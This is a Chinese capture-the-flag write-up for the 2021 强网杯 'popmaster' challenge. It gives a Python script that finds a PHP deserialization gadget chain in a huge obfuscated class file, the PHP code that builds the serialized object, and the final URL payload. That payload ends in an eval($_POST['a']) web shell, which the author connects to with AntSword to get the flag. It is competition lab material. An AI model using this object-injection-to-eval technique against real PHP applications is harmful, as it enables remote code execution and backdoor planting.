0%

强网杯2021-popmaster

强网杯2021-popmaster

0x00 写在前面

这个题目虽然当时比赛的时候做出来了,但没办法了,托纳多做不出来了,先拿这个水一篇吧😥。

说一下当时的解题过程吧。一开始看到16万行的代码实在是头大,当时还尝试再phpstorm里疯狂ctrl F ,ctrl G。在找了几条发现最后断掉的链子后,让我下定了写脚本的决心。

这次就在buu上复现一下吧。

0x01 解题过程

直接写脚本找链子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import linecache
import re
filepath="class.php"
overlist=[]
secondlist=[]
str1=linecache.getline(filepath,16)
def find(s):
ans=[]
for i in range(169288):
if s in linecache.getline(filepath,i):
ans.append(i)
return ans

def getNext(num):
for i in range (15):
line=linecache.getline(filepath,i+num)
if str1 == line:
break
if 'if(method_exists' in line :
if num in overlist:
line = linecache.getline(filepath, i + num+1)
return i+num+1,line.split("'")[1],2
else:return i+num,line.split("'")[1],2
for i in range(15):
line = linecache.getline(filepath, i + num)
if str1 == line:
break
if re.search(r"\$this->[a-zA-Z0-9]+->", line):
return i+num,line.split("->")[2][:6],1
for i in range(10):
line = linecache.getline(filepath, i + num)
if str1 == line:
break
if 'eval(' in line:
return i+num,'eval',0
print("something wrong")
return -1


def checkPop(num):
line = linecache.getline(filepath,num)
if 'public function' not in line:
print("check wrong")
return -1
popstr = line.split("(")[1].split(")")[0]
line = linecache.getline(filepath, num+1)
if 'for' in line:
line=linecache.getline(filepath, num+2)
if popstr in line.split('=')[0]:
return False
else:return True
elif popstr in line and "=" in line:
if popstr in line.split("=")[0] and re.search(r"'[a-zA-Z0-9]+'",line.split("=")[1]):
return False
else:return True
else:return True


def getClass(num):
line=linecache.getline(filepath, num)
head=num
post=num
while ('class' not in line ):
head=head-1
line = linecache.getline(filepath, head)
while ( line!=linecache.getline(filepath, 16) ):
post=post+1
line = linecache.getline(filepath, post)
return head,post


def printClass(num):
a=getClass(num)
for i in range(a[0],a[1]+2):
print(linecache.getline(filepath, i),end='')


pop=[]
def findpop(b):
global pop
flag=True
ne=(1,2)
while(flag):
p = find(b)
if ne[0]==p[0]:
i=p[1]
else:i=p[0]
pop.append(i)
print(pop)
if not checkPop(i):
i = overlist[-1]
a=-1
while i in secondlist:
a=a-1
i=overlist[a]
n=pop.index(i)
pop=pop[:n+1]
ne=getNext(i)
if ne[2]==2:
if i not in overlist:
overlist.append(i)
else: secondlist.append(i)
b=ne[1]
if b=='eval':
print('pop= ')
print(pop)
flag=False

findpop("WM5qoB")

找到能用的链子后吧pop数组记录下来,然后把从头到尾的用到的类输出成文件

1
2
3
pop=[145447, 25609, 80058, 11377, 46114, 117321, 106318, 95223, 53650, 97950, 98378, 138945, 3553, 150848, 20188, 34779, 137484, 62125, 61866, 87945, 118437, 92706, 41101]
for n in pop:
printClass(n)

对每个类加一个__construct方法然后serialize

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
<?php
class G9rCaG{
public $NOVqmuA;
public function WM5qoB($qf7dS){
for($i = 0; $i < 36; $i ++){
$apGDGv= $qf7dS;
}
$this->NOVqmuA->Lggqkg($qf7dS);
}
public function __construct(){
$this->NOVqmuA=new IL3igR();
}
}

class IL3igR{
public $ozxXPmy;
public function Lggqkg($ax50G){
for($i = 0; $i < 23; $i ++){
$axVUWV= $ax50G;
}
$this->ozxXPmy->vvSiHx($ax50G);

}
public function __construct(){
$this->ozxXPmy=new Gsm13c();
}
}

class Gsm13c{
public $cgmVUXR;
public function vvSiHx($O89Xw){
$this->z72B2 = "V2wdO";
if(method_exists($this->cgmVUXR, 'DggEHy')) $this->cgmVUXR->DggEHy($O89Xw);

}
public function __construct(){
$this->cgmVUXR=new zy2z5O();
}
}

class zy2z5O{
public $GFd8e3a;
public function DggEHy($Gp0Sg){
$this->lDRnE = "tWZRT";
$this->GFd8e3a->qpzsuz($Gp0Sg);

}
public function __construct(){
$this->GFd8e3a=new BLCEZg();
}
}

class BLCEZg{
public $KwZ6GaY;
public function qpzsuz($Ltg4A){
for($i = 0; $i < 39; $i ++){
$aIg0Zq= $Ltg4A;
}
if(method_exists($this->KwZ6GaY, 'gA0okl')) $this->KwZ6GaY->gA0okl($Ltg4A);

}
public function __construct(){
$this->KwZ6GaY=new lkKlRc();
}
}

class lkKlRc{
public $O1DZW3A;

public function gA0okl($ZD0Za){
if(3461>10533){
$ZD0Za = $ZD0Za.'F01Sc';
}
$this->O1DZW3A->zfeN0F($ZD0Za);

}
public function __construct(){
$this->O1DZW3A=new z8Upeh();
}
}

class z8Upeh{
public $R6YvEfM;
public function zfeN0F($R6pUg){
for($i = 0; $i < 27; $i ++){
$aits6h= $R6pUg;
}
$this->R6YvEfM->SyrGZV($R6pUg);

}
public function __construct(){
$this->R6YvEfM=new UI67yc();
}

}

class UI67yc{
public $d0UXrbp;
public function SyrGZV($dMwdv){
for($i = 0; $i < 11; $i ++){
$aZWsSP= $dMwdv;
}
$this->d0UXrbp->qt42U0($dMwdv);

}
public function __construct(){
$this->d0UXrbp=new EEccn4();
}

}

class EEccn4{
public $EZkFlMe;
public function qt42U0($C3fnR){
$this->Scutg = "saSCZ";
if(method_exists($this->EZkFlMe, 'GRYmu2')) $this->EZkFlMe->GRYmu2($C3fnR);

}
public function __construct(){
$this->EZkFlMe=new Kkcmro();
}
}

class Kkcmro{
public $AEqZTbK;
public function GRYmu2($inaxb){
$this->aiNyz = "fWauD";
if(method_exists($this->AEqZTbK, 'vaeNwt')) $this->AEqZTbK->vaeNwt($inaxb);

}
public function __construct(){
$this->AEqZTbK=new UGcy4B();
}
}

class UGcy4B{
public $VvUauZX;
public function vaeNwt($b1HfP){
for($i = 0; $i < 2; $i ++){
$avNXUg= $b1HfP;
}
$this->VvUauZX->BddQNE($b1HfP);

}
public function __construct(){
$this->VvUauZX=new AThehG();
}
}

class AThehG{
public $qMUucp4;
public function BddQNE($xtU5H){
for($i = 0; $i < 40; $i ++){
$aNI3rm= $xtU5H;
}
if(method_exists($this->qMUucp4, 'ayevu8')) $this->qMUucp4->ayevu8($xtU5H);

}
public function __construct(){
$this->qMUucp4=new ggkoyD();
}
}

class ggkoyD{
public $qvO0GzP;
public function ayevu8($UcnVU){
for($i = 0; $i < 38; $i ++){
$aIn9Tg= $UcnVU;
}
if(method_exists($this->qvO0GzP, 'Kx77Y3')) $this->qvO0GzP->Kx77Y3($UcnVU);

}
public function __construct(){
$this->qvO0GzP=new O2OxaK();
}
}

class O2OxaK{
public $uplrfgQ;
public function Kx77Y3($BgoB3){
$this->WMHco = "fcRR0";
if(method_exists($this->uplrfgQ, 'ZGs4dd')) $this->uplrfgQ->ZGs4dd($BgoB3);

}
public function __construct(){
$this->uplrfgQ=new h1F4az();
}
}

class h1F4az{
public $t0lDuz4;
public function ZGs4dd($ioVMW){
for($i = 0; $i < 13; $i ++){
$aSOqUc= $ioVMW;
}
if(method_exists($this->t0lDuz4, 'iXVD4B')) $this->t0lDuz4->iXVD4B($ioVMW);

}
public function __construct(){
$this->t0lDuz4=new SCi618();
}
}

class SCi618{
public $Ut1w0Vl;

public function iXVD4B($mFlmQ){
$this->FU7nm = "SkzgX";
if(method_exists($this->Ut1w0Vl, 'nnnwoE')) $this->Ut1w0Vl->nnnwoE($mFlmQ);

}
public function __construct(){
$this->Ut1w0Vl=new GPAULF();
}
}

class GPAULF{
public $TmSDBF1;
public function nnnwoE($yTGH3){
if(20294>11825){
$yTGH3 = $yTGH3.'KP9UQ';
}
if(method_exists($this->TmSDBF1, 's2smK4')) $this->TmSDBF1->s2smK4($yTGH3);

}
public function __construct(){
$this->TmSDBF1=new Vt6a7G();
}

}

class Vt6a7G{
public $GBn2F2i;
public function s2smK4($nNTTK){
for($i = 0; $i < 1; $i ++){
$aIQNhP= $nNTTK;
}
if(method_exists($this->GBn2F2i, 'SPq29m')) $this->GBn2F2i->SPq29m($nNTTK);

}
public function __construct(){
$this->GBn2F2i=new vyWaaw();
}
}

class vyWaaw{
public $YWdwezk;
public function SPq29m($OB7Dp){
if(65178>56814){
$OB7Dp = $OB7Dp.'dPwhC';
}
if(method_exists($this->YWdwezk, 'MAmvvi')) $this->YWdwezk->MAmvvi($OB7Dp);

}
public function __construct(){
$this->YWdwezk=new Tbcuhd();
}

}

class Tbcuhd{
public $gx0ckQv;

public function MAmvvi($izexU){
for($i = 0; $i < 17; $i ++){
$abdhC5= $izexU;
}
$this->gx0ckQv->it9Nqv($izexU);

}
public function __construct(){
$this->gx0ckQv=new D5TBKu();
}
}

class D5TBKu{
public $w6ehUeT;
public function it9Nqv($uhekL){
if(35336>62948){
$uhekL = $uhekL.'UIP6P';
}
if(method_exists($this->w6ehUeT, 'P3CKmc')) $this->w6ehUeT->P3CKmc($uhekL);

}
public function __construct(){
$this->w6ehUeT=new RbWK29();
}
}

class RbWK29{
public $IvGFh4x;
public function P3CKmc($mco3K){
$this->GTCgp = "MrYXz";
if(method_exists($this->IvGFh4x, 'nluxMc')) $this->IvGFh4x->nluxMc($mco3K);

}
public function __construct(){
$this->IvGFh4x=new mrgKmO();
}

}

class mrgKmO{
public $Ysi1doA;
public function nluxMc($CGfQO){
if(6937>42691){
$CGfQO = $CGfQO.'VDQ19';
}
eval($CGfQO);

}
public function __construct(){
}
}

echo urlencode(serialize(new G9rCaG()));
?>

payload

1
http://eci-2ze5gk2yzr3zlt8hemzk.cloudeci1.ichunqiu.com?pop=O%3A6%3A%22G9rCaG%22%3A1%3A%7Bs%3A7%3A%22NOVqmuA%22%3BO%3A6%3A%22IL3igR%22%3A1%3A%7Bs%3A7%3A%22ozxXPmy%22%3BO%3A6%3A%22Gsm13c%22%3A1%3A%7Bs%3A7%3A%22cgmVUXR%22%3BO%3A6%3A%22zy2z5O%22%3A1%3A%7Bs%3A7%3A%22GFd8e3a%22%3BO%3A6%3A%22BLCEZg%22%3A1%3A%7Bs%3A7%3A%22KwZ6GaY%22%3BO%3A6%3A%22lkKlRc%22%3A1%3A%7Bs%3A7%3A%22O1DZW3A%22%3BO%3A6%3A%22z8Upeh%22%3A1%3A%7Bs%3A7%3A%22R6YvEfM%22%3BO%3A6%3A%22UI67yc%22%3A1%3A%7Bs%3A7%3A%22d0UXrbp%22%3BO%3A6%3A%22EEccn4%22%3A1%3A%7Bs%3A7%3A%22EZkFlMe%22%3BO%3A6%3A%22Kkcmro%22%3A1%3A%7Bs%3A7%3A%22AEqZTbK%22%3BO%3A6%3A%22UGcy4B%22%3A1%3A%7Bs%3A7%3A%22VvUauZX%22%3BO%3A6%3A%22AThehG%22%3A1%3A%7Bs%3A7%3A%22qMUucp4%22%3BO%3A6%3A%22ggkoyD%22%3A1%3A%7Bs%3A7%3A%22qvO0GzP%22%3BO%3A6%3A%22O2OxaK%22%3A1%3A%7Bs%3A7%3A%22uplrfgQ%22%3BO%3A6%3A%22h1F4az%22%3A1%3A%7Bs%3A7%3A%22t0lDuz4%22%3BO%3A6%3A%22SCi618%22%3A1%3A%7Bs%3A7%3A%22Ut1w0Vl%22%3BO%3A6%3A%22GPAULF%22%3A1%3A%7Bs%3A7%3A%22TmSDBF1%22%3BO%3A6%3A%22Vt6a7G%22%3A1%3A%7Bs%3A7%3A%22GBn2F2i%22%3BO%3A6%3A%22vyWaaw%22%3A1%3A%7Bs%3A7%3A%22YWdwezk%22%3BO%3A6%3A%22Tbcuhd%22%3A1%3A%7Bs%3A7%3A%22gx0ckQv%22%3BO%3A6%3A%22D5TBKu%22%3A1%3A%7Bs%3A7%3A%22w6ehUeT%22%3BO%3A6%3A%22RbWK29%22%3A1%3A%7Bs%3A7%3A%22IvGFh4x%22%3BO%3A6%3A%22mrgKmO%22%3A1%3A%7Bs%3A7%3A%22Ysi1doA%22%3BN%3B%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D&argv=eval($_POST['a']);/*

直接蚁剑连接,根目录下拿到flag

0x02 写在最后

又流产了。当时的脚本好像出了点问题。或者buu上的题目不太一样。这篇是当时比赛之后写的wp,让我水一篇吧。呜呜呜。

0x03 7月9日补充

发现是自己脚本里的linecache.getline(filepath,17)17是和具体class文件有关的。按照具体题目的class文件改一下,就行了。按照上面的流程终于在buu把这道题复现了。